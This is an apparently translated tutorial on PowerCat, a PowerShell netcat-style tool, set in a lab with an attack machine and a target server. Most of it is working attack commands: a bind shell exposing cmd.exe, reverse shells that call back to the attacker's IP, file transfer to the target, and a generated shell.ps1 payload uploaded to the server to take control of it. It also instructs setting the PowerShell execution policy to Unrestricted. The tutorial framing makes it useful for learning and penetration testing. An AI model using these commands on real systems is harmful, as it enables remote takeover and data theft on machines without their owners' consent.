PowerCat Bounce Shell
Introduction to PowerCat
PowerCat is a tcp/ip Swiss army knife written by powershell. Take a look at the implementation of powershell as ncat, and then add many useful functions, such as file upload, smb protocol support, relay mode, generate payload, port scanning etc.
PowerCat installation
PowerCat download link:https://github.com/besimorhino/powercat
#导入模块
Import-Module .\powercat.ps1
#如果提示未能加载指定模块,则可能是权限问题,以管理员权限运行powershell,然后输入如下代码
Set-ExecutionPolicy Unrestricted
#输入如下命令可以查看帮助信息
powercat -h
The following is the interface for successfully importing modules
PowerCat commands
The detailed command functions of PowerCat are as follows:
| parameter | effect |
|---|---|
| -l | listen connection |
| -c | connect to the listener |
| -p | port to connect to or listen on |
| -e | implement |
| -ep | Execute Powershell |
| -r | relay. Format: "-r tcp:10.1.1.1:443" |
| -u | Data transfer via UDP |
| -dns | transfer data via dns |
| -dnsft | DNS failure threshold |
| -t | timeout options. Default: 60 |
| -I | Input: file path (string), byte array or string |
| -o | Console output type: 'host', 'bytes' or 'string' |
| -of | output file path |
| -d | Disconnect after connecting |
| -rep | repeater. Restart after disconnecting |
| -g | generate payload |
| -ge | Generate encoded payload |
| -h | print help message |
PowerCat experiment
experimental topology
| Machine name | IP |
|---|---|
| attack machine | 192.168.41.20 |
| server | 192.168.41.130 |
PowerCat and nc forward connection
The server executes the following command using powercat
powercat -l -p 8080 -e cmd.exe -v
The attacker uses nc to execute the following command
nc64.exe 192.168.41.130 8080 -vv
Looking at the returned results, we found that we successfully forwarded the shell to the target server
PowerCat and nc reverse connection
The attacker uses nc to execute the following command
nc64.exe -l -p 8888 -vv
The server executes the following command using powercat
powercat -c 192.168.41.20 -p 8888 -v -e cmd.exe
View the returned results and found that we successfully reverse shelled to the target server
PowerCat and PowerCat Reverse Connect
The attacker uses powercat to execute the following command
powercat -l -p 9999 -v
The server executes the following command using powercat
powercat -c 192.168.41.20 -p 9999 -v -ep
View the returned results and found that we successfully reverse shelled to the target server
PowerCat File Transfer
The server executes the following command using powercat
powercat -l -p 9999 -of test.txt -v
The attacker uses powercat to execute the following command
powercat -c 192.168.41.130 -p 9999 -i C:test.txt -v
View the returned results and found that our server received the target file
Use powercat to generate payload connection shell
Attacker uses powercat to execute the following command to generate payload
powercat -l -p 8000 -e cmd -v -g >> shell.ps1
Upload the shell file to the target server, and then run the script on the server
.\shell.ps1
The attacker uses powercat to execute the following command to connect
powercat -c 192.168.41.130 -p 8000 -v
View the results of the operation and found that we successfully controlled the target server
